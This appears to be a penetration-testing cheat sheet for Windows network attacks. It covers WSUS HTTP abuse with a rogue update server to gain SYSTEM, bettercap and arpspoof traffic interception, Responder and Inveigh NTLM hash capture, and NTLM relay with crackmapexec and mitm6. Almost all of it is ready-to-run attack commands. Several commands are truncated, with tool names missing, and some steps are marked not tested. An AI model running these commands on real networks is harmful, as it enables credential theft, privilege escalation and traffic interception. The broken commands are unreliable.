WSUS HTTP misconfiguration

  1. Possibility to have MiTM position with the vulnerable host
  2. Communication between the victim and the WSUS server is over HTTP

If you have user access on the victim machine, it will permit to get SYSTEM privileges.

If the poisoning does not work (different broadcast domains) and you have access to victim machine, you can attempt to setup a system proxy manually (attacker IP and port 8530). The proxy redirection of the port 8530 will still be needed.

You can also spoof other machines, but you depend on the update frequency.

Check registry on WSUS client machine

Protocol should be HTTP in key WUServer. Example of vulnerable URL:http://wsus-server.local:8530.

REG QUERY "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate"

Check that the computer uses WSUS for update, and the update policy.

REG QUERY "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU"

GPO alternative: Group Policy–Windows Components > Windows Update > Specify intranet Microsoft update service location.

Tooling install

Install from

Activate venv if used during setup.

source ./venv/bin/activate
Start WSUS rogue server

Ensure PsExec64.exe is in pywsus current directory (WSUS will only accept MS signed binary).

python3 -H <ATTACKER_IP> -p 8530 -e PsExec64.exe -c '/accepteula /s cmd.exe /c "whoami > C:\\poc.txt" '
MiTM position

Content of wsus.cap:

arp.spoof on
set any.proxy.src_port 8530
set any.proxy.dst_port 8530
set any.proxy.dst_address <ATTACKER_IP>
any.proxy on

Start poisoning.

sudo bettercap -i <IFACE> --caplet wsus.cap


Set challenge to 1122334455667788 in /etc/responder/Responder.conf

The option -f may prevent challenge-response capture.

Passive mode

responder -I <interface> -A

Active mode

responder -I <interface> -wrf

Aggressive mode

responder -I eth0 -wrf -F -P --lm >> responder.txt
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}'
grep -a "NTLMv" responder.txt | grep Hash
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}' | awk -F ":" '{print $1 "::::" $5 ":" $6}'

Hardcore mode

responder -I eth0 -wrfb -F -P --lm >> responder.txt
grep -a -i password responder.txt -B3


NTLM MITM attacks


Invoke-Inveigh -ConsoleOutput Y
Invoke-Inveigh -ConsoleOutput N -RunTime 15 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y

Packet can be captured in order to extract the hashes

netsh trace start scenario=NetConnection capture=yes persistent=no maxSize=100MB traceFile=C:\NetTrace2.etl

NTLMv1 downgrade attack

NTLM Relay

SMB signing has to be disable for this kind of attack. On Windows 10 machines IPv6 is prefered as IPv4.

Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target <ip> -Command "<cmd>" -Attack Enumerate,Execute,Session
cme smb <CIDR> --gen-relay-list smbrelay.txt
responder -I <interface> -r -d -w -tf smbrelay.txt

Add computer start BH (not tested) -t ldaps://<dc_fqdn> --add-computer
python -d <domain> -u <computer>\$ -p '<password>'

Priv exchange (not tested) -t ldap://<dc_fqdn> --escalate-user <user>

python -ah <fqdn> <dc_fqdn> -u <user> -d <domain>


mitm6 -d <fqdn> -wh <webserver_hosting_wpad>:80 -t smb://<target_ip>/ -i

Relay and delegation

ARP Spoofing

Without Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -i eth0 <target>
tcpdump -i eth0 -S 65535 -w out.pcap -vv

With Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -t <target> <gateway>
tcpdump -i eth0 -S 65535 -w out.pcap -vv